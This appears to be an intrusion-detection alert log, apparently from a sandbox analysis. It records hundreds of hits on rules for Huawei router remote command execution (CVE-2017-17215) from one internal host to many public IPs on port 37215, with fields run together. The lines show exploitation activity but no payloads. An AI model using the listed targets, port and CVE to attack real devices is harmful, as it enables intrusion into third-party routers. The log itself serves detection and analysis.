                                            06/14/24-10:44:22.861130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3314237215192.168.2.14197.102.173.38
                                            06/14/24-10:43:39.792758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407837215192.168.2.14197.19.65.244
                                            06/14/24-10:44:29.027152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5651237215192.168.2.14197.238.38.144
                                            06/14/24-10:43:45.968836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695437215192.168.2.1441.230.196.231
                                            06/14/24-10:44:08.504676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974437215192.168.2.1441.127.221.16
                                            06/14/24-10:44:02.383617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469037215192.168.2.14156.80.216.96
                                            06/14/24-10:43:50.073121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993437215192.168.2.14197.218.212.172
                                            06/14/24-10:43:39.788962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050037215192.168.2.14156.248.173.7
                                            06/14/24-10:44:35.177664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3736837215192.168.2.1441.213.188.12
                                            06/14/24-10:44:18.779220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5742437215192.168.2.14197.43.79.29
                                            06/14/24-10:44:18.765097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3679437215192.168.2.14156.168.100.165
                                            06/14/24-10:43:52.159682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639237215192.168.2.14197.242.81.4
                                            06/14/24-10:43:36.724976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710237215192.168.2.1441.171.192.181
                                            06/14/24-10:43:45.967858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3301037215192.168.2.14197.174.167.252
                                            06/14/24-10:44:16.715160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5539637215192.168.2.1441.175.6.114
                                            06/14/24-10:44:00.321246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5903637215192.168.2.14156.49.236.39
                                            06/14/24-10:43:39.789741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719437215192.168.2.14197.21.25.29
                                            06/14/24-10:43:56.230841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300637215192.168.2.14197.200.213.184
                                            06/14/24-10:44:22.859816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5135837215192.168.2.14197.75.208.151
                                            06/14/24-10:44:10.549338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5104437215192.168.2.14156.236.149.30
                                            06/14/24-10:43:37.761900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3318437215192.168.2.14156.92.241.165
                                            06/14/24-10:43:56.244119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695237215192.168.2.14197.249.95.142
                                            06/14/24-10:44:29.015018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869437215192.168.2.14197.21.101.151
                                            06/14/24-10:43:54.186506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652037215192.168.2.14197.115.63.233
                                            06/14/24-10:44:22.881342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5975437215192.168.2.14156.109.188.212
                                            06/14/24-10:44:06.472372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832037215192.168.2.14156.236.36.53
                                            06/14/24-10:43:56.244489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553437215192.168.2.14197.167.77.120
                                            06/14/24-10:44:22.879329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4343837215192.168.2.1441.239.16.237
                                            06/14/24-10:44:35.181713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665437215192.168.2.1441.81.58.87
                                            06/14/24-10:43:50.068895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491437215192.168.2.14197.24.140.18
                                            06/14/24-10:44:08.517929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911637215192.168.2.1441.250.38.18
                                            06/14/24-10:44:22.862322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3342037215192.168.2.14197.32.221.83
                                            06/14/24-10:44:20.805628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5655437215192.168.2.1441.191.55.76
                                            06/14/24-10:44:33.134666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093237215192.168.2.1441.141.180.72
                                            06/14/24-10:44:33.148842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4037437215192.168.2.1441.133.6.29
                                            06/14/24-10:43:48.020900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860437215192.168.2.14156.69.181.229
                                            06/14/24-10:44:04.410959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515437215192.168.2.1441.109.29.14
                                            06/14/24-10:43:50.115463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5470437215192.168.2.1441.247.215.208
                                            06/14/24-10:43:48.045901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488437215192.168.2.1441.55.60.154
                                            06/14/24-10:43:36.726481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5470637215192.168.2.1441.98.9.92
                                            06/14/24-10:44:29.012593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3847837215192.168.2.14156.147.66.243
                                            06/14/24-10:44:18.779929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3847037215192.168.2.1441.174.114.20
                                            06/14/24-10:43:58.277067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641237215192.168.2.14197.161.161.248
                                            06/14/24-10:43:58.291141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5736037215192.168.2.1441.45.11.172
                                            06/14/24-10:44:06.450218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975237215192.168.2.14156.133.228.200
                                            06/14/24-10:44:08.503487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3436237215192.168.2.1441.9.240.88
                                            06/14/24-10:44:20.804976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4799037215192.168.2.14156.123.199.117
                                            06/14/24-10:44:16.717867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5040637215192.168.2.14197.58.66.74
                                            06/14/24-10:43:45.988149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600237215192.168.2.14156.17.166.208
                                            06/14/24-10:44:24.916616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4190237215192.168.2.1441.41.177.221
                                            06/14/24-10:44:06.470907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5130037215192.168.2.14156.199.45.159
                                            06/14/24-10:43:43.971337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377837215192.168.2.1441.128.113.63
                                            06/14/24-10:44:02.365322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491637215192.168.2.14156.252.104.41
                                            06/14/24-10:43:39.813478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5400837215192.168.2.14197.102.175.56
                                            06/14/24-10:44:14.669674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997837215192.168.2.14156.60.250.80
                                            06/14/24-10:44:24.917679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5556637215192.168.2.14156.6.3.53
                                            06/14/24-10:43:56.227898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5910637215192.168.2.14197.172.248.167
                                            06/14/24-10:43:37.759351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5008637215192.168.2.14156.151.244.137
                                            06/14/24-10:44:24.941620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868837215192.168.2.14156.134.157.204
                                            06/14/24-10:44:00.334735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016837215192.168.2.14156.234.179.36
                                            06/14/24-10:44:14.672868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677637215192.168.2.14197.205.248.148
                                            06/14/24-10:43:45.967310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3812237215192.168.2.14197.217.233.133
                                            06/14/24-10:44:16.718343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605837215192.168.2.14197.237.128.169
                                            06/14/24-10:43:48.021690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446437215192.168.2.1441.2.34.234
                                            06/14/24-10:44:26.998206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660237215192.168.2.14197.168.202.168
                                            06/14/24-10:44:08.517797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056237215192.168.2.14156.149.80.39
                                            06/14/24-10:43:50.115533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4773637215192.168.2.1441.160.75.101
                                            06/14/24-10:44:10.549395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4274437215192.168.2.1441.41.172.152
                                            06/14/24-10:43:37.759000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5948837215192.168.2.14156.226.51.240
                                            06/14/24-10:44:10.544404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4676037215192.168.2.14197.93.61.171
                                            06/14/24-10:43:37.762143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154437215192.168.2.14197.111.207.188
                                            06/14/24-10:43:58.277584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4376037215192.168.2.1441.199.50.212
                                            06/14/24-10:43:34.677263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5809037215192.168.2.14197.191.254.222
                                            06/14/24-10:43:54.202708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562437215192.168.2.1441.129.30.138
                                            06/14/24-10:43:56.245984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819037215192.168.2.14197.156.229.79
                                            06/14/24-10:44:29.014658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984237215192.168.2.1441.186.25.114
                                            06/14/24-10:44:18.766784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3636037215192.168.2.14197.167.203.53
                                            06/14/24-10:44:29.027676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4530237215192.168.2.14197.73.203.236
                                            06/14/24-10:44:22.859140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4816637215192.168.2.1441.3.184.194
                                            06/14/24-10:43:36.702550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778437215192.168.2.1441.196.33.190
                                            06/14/24-10:44:12.625043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980237215192.168.2.14156.18.122.45
                                            06/14/24-10:44:00.342052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755237215192.168.2.1441.137.222.253
                                            06/14/24-10:44:33.131679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473837215192.168.2.14197.130.210.113
                                            06/14/24-10:44:14.669302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985037215192.168.2.1441.98.23.60
                                            06/14/24-10:44:06.449656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4229437215192.168.2.14197.24.71.53
                                            06/14/24-10:43:36.704189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000637215192.168.2.1441.158.221.77
                                            06/14/24-10:43:48.019316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006637215192.168.2.14197.140.111.133
                                            06/14/24-10:44:08.520668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4517037215192.168.2.14197.141.222.101
                                            06/14/24-10:43:37.772213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5012837215192.168.2.1441.41.112.171
                                            06/14/24-10:43:50.075171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357637215192.168.2.14197.111.11.202
                                            06/14/24-10:43:56.245520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4496237215192.168.2.1441.57.225.90
                                            06/14/24-10:44:20.804308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5647437215192.168.2.1441.100.115.242
                                            06/14/24-10:44:24.943423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3360437215192.168.2.14156.245.165.86
                                            06/14/24-10:44:02.381307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752837215192.168.2.1441.130.147.86
                                            06/14/24-10:43:37.763074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5206437215192.168.2.14156.24.199.229
                                            06/14/24-10:44:08.501600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3985637215192.168.2.14197.209.136.193
                                            06/14/24-10:43:50.110947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3985437215192.168.2.14197.84.46.231
                                            06/14/24-10:44:29.013947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137037215192.168.2.1441.239.29.181
                                            06/14/24-10:44:18.777602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680637215192.168.2.14156.153.120.17
                                            06/14/24-10:44:10.563016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4888037215192.168.2.14197.156.59.168
                                            06/14/24-10:44:16.716546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155437215192.168.2.14197.114.216.128
                                            06/14/24-10:44:16.718726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3337637215192.168.2.14156.19.249.38
                                            06/14/24-10:44:04.421932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5502837215192.168.2.14197.102.205.160
                                            06/14/24-10:43:34.662882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735837215192.168.2.1441.86.97.148
                                            06/14/24-10:43:48.033904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261637215192.168.2.1441.38.165.136
                                            06/14/24-10:43:39.812760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926637215192.168.2.14156.91.246.73
                                            06/14/24-10:44:20.831115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071237215192.168.2.1441.234.227.0
                                            06/14/24-10:44:22.880170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085637215192.168.2.14156.235.193.209
                                            06/14/24-10:44:33.151081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5763237215192.168.2.14197.225.104.17
                                            06/14/24-10:44:02.383409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5203637215192.168.2.1441.29.8.241
                                            06/14/24-10:44:18.761460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3889037215192.168.2.1441.36.124.159
                                            06/14/24-10:43:39.810027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919637215192.168.2.14156.2.241.249
                                            06/14/24-10:44:12.647017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4406637215192.168.2.14156.233.5.75
                                            06/14/24-10:44:18.765839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552037215192.168.2.14156.254.91.56
                                            06/14/24-10:44:33.135112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469837215192.168.2.1441.130.183.53
                                            06/14/24-10:43:58.276249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5170037215192.168.2.14156.62.231.171
                                            06/14/24-10:44:10.580628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4315837215192.168.2.14156.251.60.242
                                            06/14/24-10:43:36.717681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5865637215192.168.2.14156.214.111.110
                                            06/14/24-10:44:04.424792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5858437215192.168.2.14197.42.83.35
                                            06/14/24-10:44:14.683558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4015437215192.168.2.14156.193.62.54
                                            06/14/24-10:44:00.326228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543837215192.168.2.14156.94.20.96
                                            06/14/24-10:44:26.978215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4991237215192.168.2.14156.132.31.221
                                            06/14/24-10:44:22.862446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5811037215192.168.2.1441.250.209.47
                                            06/14/24-10:43:39.808912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085637215192.168.2.14156.21.53.94
                                            06/14/24-10:43:54.183628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013837215192.168.2.14156.59.133.224
                                            06/14/24-10:44:24.917585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3535437215192.168.2.14197.87.158.149
                                            06/14/24-10:43:56.244805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324037215192.168.2.14197.145.124.202
                                            06/14/24-10:44:22.879873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944837215192.168.2.14156.232.54.89
                                            06/14/24-10:44:16.735331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5622437215192.168.2.14197.205.59.208
                                            06/14/24-10:44:20.830042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314037215192.168.2.14197.114.79.96
                                            06/14/24-10:44:16.716112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933437215192.168.2.14156.166.90.226
                                            06/14/24-10:44:18.761431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850637215192.168.2.1441.189.9.187
                                            06/14/24-10:43:58.293068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304637215192.168.2.14156.211.136.146
                                            06/14/24-10:44:33.149483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934237215192.168.2.14197.140.73.26
                                            06/14/24-10:44:10.546274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3922037215192.168.2.14156.33.111.195
                                            06/14/24-10:43:43.941916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056837215192.168.2.14156.174.86.73
                                            06/14/24-10:44:04.409600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153837215192.168.2.14156.249.142.224
                                            06/14/24-10:43:50.074962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4205837215192.168.2.14156.86.219.251
                                            06/14/24-10:44:00.340583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4977837215192.168.2.1441.182.59.230
                                            06/14/24-10:44:08.521576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452637215192.168.2.14197.85.164.66
                                            06/14/24-10:44:29.014623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703237215192.168.2.14156.11.105.168
                                            06/14/24-10:43:45.966209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549037215192.168.2.1441.52.170.70
                                            06/14/24-10:44:00.335331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5846037215192.168.2.14156.129.79.96
                                            06/14/24-10:43:34.662967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422437215192.168.2.14156.83.228.55
                                            06/14/24-10:44:12.618791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571237215192.168.2.1441.67.165.9
                                            06/14/24-10:44:22.857641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975437215192.168.2.1441.220.123.118
                                            06/14/24-10:43:56.245479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5268237215192.168.2.14156.133.193.224
                                            06/14/24-10:43:45.969714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4057837215192.168.2.14156.203.4.7
                                            06/14/24-10:43:43.943760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4463837215192.168.2.14156.187.168.199
                                            06/14/24-10:43:50.073179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3988037215192.168.2.14156.39.19.164
                                            06/14/24-10:44:04.422140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5638837215192.168.2.14197.87.48.166
                                            06/14/24-10:44:02.365942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499437215192.168.2.14197.49.104.62
                                            06/14/24-10:44:04.408080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578037215192.168.2.14197.88.100.124
                                            06/14/24-10:43:36.724389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3789837215192.168.2.1441.107.1.22
                                            06/14/24-10:44:31.052969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3332837215192.168.2.14197.95.59.126
                                            06/14/24-10:44:26.977159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298437215192.168.2.14197.208.168.2
                                            06/14/24-10:44:33.152146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016237215192.168.2.14156.12.29.65
                                            06/14/24-10:44:31.094401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927037215192.168.2.14156.73.60.62
                                            06/14/24-10:43:36.699343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5807237215192.168.2.14197.168.250.8
                                            06/14/24-10:44:04.423405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4489837215192.168.2.14197.133.196.209
                                            06/14/24-10:44:14.671500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5215637215192.168.2.14197.207.166.240
                                            06/14/24-10:44:20.831635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5597437215192.168.2.14197.132.75.237
                                            06/14/24-10:44:08.520569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5892037215192.168.2.1441.167.93.113
                                            06/14/24-10:44:20.828948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713237215192.168.2.14197.127.47.225
                                            06/14/24-10:44:06.452635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623237215192.168.2.1441.129.207.237
                                            06/14/24-10:44:12.624449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188637215192.168.2.1441.68.131.24
                                            06/14/24-10:44:12.645611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710837215192.168.2.14156.166.92.194
                                            06/14/24-10:44:18.766740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3557437215192.168.2.1441.138.7.91
                                            06/14/24-10:43:54.199854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3351837215192.168.2.1441.154.203.196
                                            06/14/24-10:44:10.563545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362637215192.168.2.1441.182.139.154
                                            06/14/24-10:44:31.092066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020237215192.168.2.14156.102.200.91
                                            06/14/24-10:44:18.763136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3413037215192.168.2.14197.111.143.77
                                            06/14/24-10:44:12.641352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364037215192.168.2.14156.104.164.186
                                            06/14/24-10:44:33.133581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089237215192.168.2.14197.143.250.56
                                            06/14/24-10:44:08.521688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118237215192.168.2.14156.21.111.91
                                            06/14/24-10:43:43.941180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4869637215192.168.2.14197.80.90.185
                                            06/14/24-10:43:58.277330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4013237215192.168.2.14156.86.117.14
                                            06/14/24-10:43:36.705144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507037215192.168.2.14197.239.56.251
                                            06/14/24-10:43:39.811288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197637215192.168.2.14156.163.89.33
                                            06/14/24-10:43:56.227858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3928437215192.168.2.1441.51.67.3
                                            06/14/24-10:43:54.186403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5013037215192.168.2.1441.232.120.71
                                            06/14/24-10:44:26.998238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4609637215192.168.2.14197.153.240.160
                                            06/14/24-10:44:33.149452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843037215192.168.2.1441.171.59.80
                                            06/14/24-10:44:02.365096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5782837215192.168.2.1441.247.14.12
                                            06/14/24-10:44:22.879223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5403837215192.168.2.1441.225.185.122
                                            06/14/24-10:43:43.943730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5722237215192.168.2.1441.72.161.107
                                            06/14/24-10:43:36.728142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985037215192.168.2.14197.34.83.107
                                            06/14/24-10:44:00.344411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751637215192.168.2.14197.176.156.161
